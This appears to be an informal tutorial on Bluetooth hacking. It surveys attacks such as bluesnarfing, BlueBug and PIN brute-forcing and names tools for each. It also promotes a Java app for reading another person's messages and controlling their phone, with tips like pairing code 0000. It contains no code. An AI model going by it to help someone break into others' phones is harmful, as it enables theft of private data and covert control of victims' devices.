BlueTooth Hacking
Discovering Bluetooth Devices:-
Before any two bluetooth enabled devices can start communicating with one another, they must carry out a procedure known as discovery.
It can be carried out by scanning for other active devices within the range.
- Recommended Tools ⇒
- BlueScanner
- It will try to extract as much information as possible for each newly discovered device
- BlueSniff
- It is a GUI-based utility for finding discoverable and hidden Bluetooth-enabled devices
- BTBrowser
- It is a J2ME application that can browse and explore the technical specification of surrounding Bluetooth enabled devices.
- It works on phones that supports JSR-82 - the Java Bluetooth specification
- BTCrawler
- It is a scanner for Windows Mobile based devices.
- It also implements the BlueJacking and BlueSnarfing attacks
Hacking Bluetooth Devices :-
There are a variety of different types of bluetooth related threats and attacks that can be executed against unsuspecting mobile phone users.
Following are some of the most common types of threats :-
1) BluePrinting Attack :-
Information gathering is the first step in the quest to break into target system.
Even BlueTooth devices can be fingerprinted or probed for information gathering using the technique known as BluePrinting.
Using this one can determine manufacturer, model, version, etc. for target bluetooth enabled device.
Recommended Tools ⇒
- BluePrint
- BTScanner
- It is an information gathering tool that allows attacker to query devices without the need to carry out pairing
2) BlueJack Attack :-
Bluejacking is the process of sending an anonymous message from a bluetooth enabled phone to another, within a particular range without knowing the exact source of the recieved message to the recepient.
Recommended Tools ⇒
- FreeJack
- Bluejacking tool written in JAVA
- CIHWB
- Can I Hack With Bluetooth (CIHWB)
- It is a Bluetooth security auditing framework for Windows Mobile 2005.
- Supports BlueSnarf, BlueJack, and some DoS attacks. Should work on any PocketPC with the Microsoft Bluetooth stack
3) BlueSnarf Attack :-
Bluesnarfing is the process of connecting vulnerable mobile phones through bluetooth, without knowing the victim.
It involves OBEX protocol by which an attacker can forcibly push/pull sensitive data in/out of the victim's mobile phone, hence also known as
OBEX pull attack.
OBEX ⇒ OBject EXchange ⇒ a communications protocol that facilitates the exchange of binary objects between devices
This attack requires J2ME enabled mobile phones as the attacker tool.
With J2ME enabled phone, just by using bluesnarfing tools like Blooover, Redsnarf, Bluesnarf, etc.
an attacker can break into target mobile phone for stealing sensitive data such as address book, photos, mp3, videos, SMS, ......!
Recommended Tools ⇒
- Blooover
- It is a J2ME-based auditing tool.
- It is intended to serve as an auditing tool to check whether a mobile phone is vulnerable.
- It can also be used to carry out BlueBug attack
- RedSnarf
- One of the best bluesnarfing tool
- BlueSnarfer
- It downloads the phone-book of any mobile device vulnerable to Bluesnarfing
4) Blue Backdoor Attack :-
Here, the bluetooth related vulnerability exploits the pairing mechanism that is used to establish a connection between two bluetooth enabled devices.
Not only does it gives the attacker complete access and control over the target but also allows the attacker to place strategic backdoors for continued access and entry.
5) BlueBug Attack :-
It was first discovered by Martin Herfurt and allows attackers to gain complete control over the data, voice and messaging channels of vulnerable target mobile phones.
Recommended Tools ⇒
- BlueBugger
- Exploits the BlueBug vulnerability
- Bluediving
- It is a Bluetooth penetration testing suite.
- It implements attacks like Bluebug, BlueSnarf, BlueSnarf++, BlueSmack, etc.
6)
The bluetooth protocol allows devices to use 16 digit long pairing codes.
Unfortunately many applications continue to use only 4 digit pairing codes which can be easily brute-forced. This is known as short pairing codes.
Most slave bluetooth devices continue to use default pairing codes such as 0000, 1111, 1234, etc. So, easy to crack and gain access...!
Recommended Tools ⇒
- BTCrack
- BTCrack is a Bluetooth Pass phrase (PIN) cracking tool.
- BTCrack aims to reconstruct the Passkey and the Link key from captured Pairing exchanges
-: Other Powerful BlueTooth Hacking Tools :-
Transient Bluetooth Environment Auditor :-
T-BEAR is a security-auditing platform for Bluetooth-enabled devices. The platform consists of Bluetooth discovery tools, sniffing tools and various cracking tools.
BlueTest :-
BlueTest is a Perl script designed to do data extraction from vulnerable Bluetooth-enabled devices.
BTAudit :-
BTAudit is a set of programs and scripts for auditing Bluetooth-enabled devices.
RedFang :-
It is a brute force tool that finds even non-discoverable device.
BlueAlert:-
A windows based tool that runs on bluetooth enabled computer and alerts the user each time a blurtooth device leaves or enters into its range.
BlueFang:- Similar to BlueAlert.
Bluestumbler:- One of the best BluePrinting tool.
Super Bluetooth Hack :-
With this java software you can connect to another mobile and ….
Once connected to a another phone via bluetooth you can-
- Read his/her messages
- Read his/her contacts
- Change profile
- Play ringtone even if phone is on silent
- Play songs
- Restart the phone
- Switch off the phone
- Restore factory settings
- Change ringing volume
- Call from his phone it includes all call functions like hold, etc.
Notes:-
When connecting devices use a code 0000
At start of program on smartphones do not forget to turn on bluetooth before start of the mobile .
